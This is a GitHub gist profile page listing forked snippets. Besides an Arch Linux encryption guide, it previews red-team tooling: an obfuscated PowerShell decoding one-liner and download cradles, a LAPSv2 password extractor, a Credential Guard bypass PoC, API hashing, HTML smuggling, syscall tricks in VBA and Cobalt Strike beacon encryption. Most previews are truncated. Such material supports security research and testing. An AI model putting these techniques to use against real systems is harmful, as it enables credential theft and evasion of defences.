Skip to content

Instantly share code, notes, and snippets.

View iNoSec2's full-sized avatar

iNoSec2

32 followers · 24 following
View GitHub Profile
@iNoSec2
iNoSec2 / install-arch.md
Created February 5, 2024 06:57 — forked from mjnaderi/install-arch.md
Installing Arch Linux with Full Disk Encryption (LVM on LUKS)

Installing Arch Linux with Full Disk Encryption

If you're aiming for a seamless Arch Linux installation in UEFI mode, follow along as this guide will walk you through the process step by step. We'll be using LUKS (Linux Unified Key Setup) and LVM (Logical Volume Manager) partitions on LUKS to achieve full disk encryption.

Note: I have updated this doc for UEFI mode. For those with BIOS/MBR systems, you can refer to the previous version, but keep in mind that it might be outdated and no longer accurate.

If you're only interested in installing Linux and not setting up dual boot with Windows, feel free to skip the Windows-related sections.

@iNoSec2
iNoSec2 / Download-Cradles-Oneliners.md
Created July 18, 2023 08:22 — forked from mgeeky/Download-Cradles-Oneliners.md
Various Powershell Download Cradles purposed as one-liners

Download Cradles

0) Extra goodies

  • Obfuscated FromBase64String with -bxor nice for dynamic strings deobfuscation:
$t=([type]('{1}{0}'-f'vert','Con'));($t::(($t.GetMethods()|?{$_.Name-clike'F*g'}).Name).Invoke('Yk9CA05CA0hMV0I=')|%{$_-bxor35}|%{[char]$_})-join''
  • The same as above but for UTF-16 base64 encoded strings:
@iNoSec2
iNoSec2 / .htaccess
Last active July 3, 2023 14:24 — forked from curi0usJack/.htaccess
FYI THIS IS NO LONGER AN .HTACCESS FILE. SEE COMMENTS BELOW. DON'T WORRY, IT'S STILL EASY.
# TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__!
#
# Note this version requires Apache 2.4+
#
# Save this file into something like /etc/apache2/redirect.rules.
# Then in your site's apache conf file (in /etc/apache2/sites-avaiable/), put this statement somewhere near the bottom
#
# Include /etc/apache2/redirect.rules
#
@iNoSec2
iNoSec2 / lapsv2_decryptor.py
Created May 17, 2023 17:38 — forked from zblurx/lapsv2_decryptor.py
Simple script to extract local admin password in cleartext with LAPSv2 using impacket
import argparse
import typing
import math
from uuid import UUID
from pyasn1.codec.der import decoder
from pyasn1_modules import rfc5652
from struct import unpack
from cryptography import utils
from cryptography.exceptions import AlreadyFinalized, InvalidKey
from cryptography.hazmat.primitives.kdf import KeyDerivationFunction
@iNoSec2
iNoSec2 / Source.cpp
Created May 8, 2023 17:25 — forked from alfarom256/Source.cpp
Thread Execution via NtCreateWorkerFactory
#include <Windows.h>
#include <winternl.h>
#include <stdio.h>
#define WORKER_FACTORY_FULL_ACCESS 0xf00ff
// https://github.com/winsiderss/systeminformer/blob/17fb2e0048f062a04394c4ccd615b611e6ffd45d/phnt/include/ntexapi.h#LL1096C1-L1115C52
typedef enum _WORKERFACTORYINFOCLASS
{
WorkerFactoryTimeout, // LARGE_INTEGER
@iNoSec2
iNoSec2 / CredGuard_PoC
Created January 3, 2023 13:41 — forked from N4kedTurtle/CredGuard_PoC
PoC for enabling wdigest to bypass credential guard
#define _CRT_SECURE_NO_WARNINGS
#include <Windows.h>
#include <Psapi.h>
#include <TlHelp32.h>
#include <iostream>
DWORD GetLsassPid() {
PROCESSENTRY32 entry;
entry.dwSize = sizeof(PROCESSENTRY32);
@iNoSec2
iNoSec2 / api_hashing.cs
Created December 22, 2022 06:12
Windows API Hashing in C#
using System;
using System.Runtime.InteropServices;
namespace API_Hashing
{
class Program
{
[DllImport("kernel32", SetLastError = true, CharSet = CharSet.Ansi)]
static extern IntPtr LoadLibrary([MarshalAs(UnmanagedType.LPStr)] string lpFileName);
@iNoSec2
iNoSec2 / html-smuggling-example.html
Created September 25, 2022 20:07 — forked from JamesCooteUK/html-smuggling-example.html
HTML Smuggling Example
<!doctype html>
<html>
<head>
<meta name="viewport" content="width=device-width" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Simple Transactional Email</title>
<style>
/* -------------------------------------
GLOBAL RESETS
------------------------------------- */
@iNoSec2
iNoSec2 / FreshyCalls-VBA.vba
Created September 5, 2022 09:21 — forked from X-C3LL/FreshyCalls-VBA.vba
Retrieving SSN for syscalling in VBA following FreshyCalls technique
' Proof of Concept: retrieving SSN for syscalling in VBA
' Author: Juan Manuel Fernandez (@TheXC3LL)
'Based on:
'https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/
'https://www.crummie5.club/freshycalls/
Private Type LARGE_INTEGER
@iNoSec2
iNoSec2 / beacon-aes.py
Created July 18, 2022 19:51 — forked from olliencc/beacon-aes.py
CobaltStrike Beacon AES encryption
import hashlib
import hmac
import binascii
import base64
import sys
import struct
from Crypto.Cipher import AES
HASH_ALGO = hashlib.sha256
SIG_SIZE = HASH_ALGO().digest_size